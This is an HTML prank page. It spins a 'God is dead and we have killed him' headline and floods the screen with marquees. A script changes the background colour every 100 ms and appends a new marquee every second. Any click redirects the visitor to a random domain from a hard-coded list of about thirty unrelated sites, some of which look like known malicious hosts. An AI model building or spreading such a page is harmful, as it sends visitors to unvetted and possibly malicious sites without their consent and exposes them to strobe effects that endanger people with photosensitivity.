<!DOCTYPE html>
<html>
<style>
    h1 { margin-top: 200px; z-index: 1; animation: anim 2s infinite linear; position: absolute; }
    body { display: block; font-family: 'Comic Sans MS';  }
    marquee { width: 100vw; animation: marquee 5s infinite linear; z-index: -1; }
    @keyframes spin {
        0% { transform: rotate(0deg); margin-left: 0px; }
        100% { transform: rotate(360deg); margin-left: 100px; }
    }
    @keyframes anim {
        0% { 
            transform: rotateY(0deg);
            transform: rotateZ(0deg);
            font-size: 2vh;
            color: orange;
        }
        20% { color: yellow; }
        40% { color: green; }
        50% {
            font-size: 10vh;
            color: purple;
        }
        100% {
            transform: rotateY(360deg);
            transform: rotateZ(360deg);
            font-size: 2vh;
            color: pink;
        }
    }
</style>
<script defer>
    sites = ["www.17ebook.co", "www.aladel.net", "www.bpwhamburgorchardpark.org", "www.clicnews.com", "www.dfwdiesel.net", "www.divineenterprises.net", "www.fantasticfilms.ru", "www.gardensrestaurantandcatering.com", "www.ginedis.com", "www.gncr.org", "www.hdvideoforums.org", "www.hihanin.com", "www.kingfamilyphotoalbum.com", "www.likaraoke.com", "www.mactep.org", "www.magic4you.nu", "www.marbling.pe.kr", "www.nacjalneg.info", "www.pronline.ru", "www.purplehoodie.com", "www.qsng.cn", "www.seksburada.net", "www.sportsmansclub.net", "www.stock888.cn", "www.tathli.com", "www.teamclouds.com", "www.texaswhitetailfever.com", "www.wadefamilytree.org", "www.xnescat.info", "www.yt118.com"]
    document.onclick = () => location.href = `https://${sites[Math.floor(Math.random() * sites.length)]}`
    setInterval(() => {
        document.querySelector('body').style.background = `#${Math.floor(Math.random()*16777215).toString(16)}`
        for (m of document.querySelectorAll('marquee')) {
            m.style.color = `#${Math.floor(Math.random()*16777215).toString(16)}`
            m.style.fontSize = `${Math.random() * 100}px`
        }
    }, 100)
    setInterval(() => document.querySelector('body').innerHTML += '<marquee direction="right" scrollamount=100>God is dead and we have killed him</marquee>', 1000)
</script>
<body>
<h1>God is dead and we have killed him</h1>

</body>
</html>
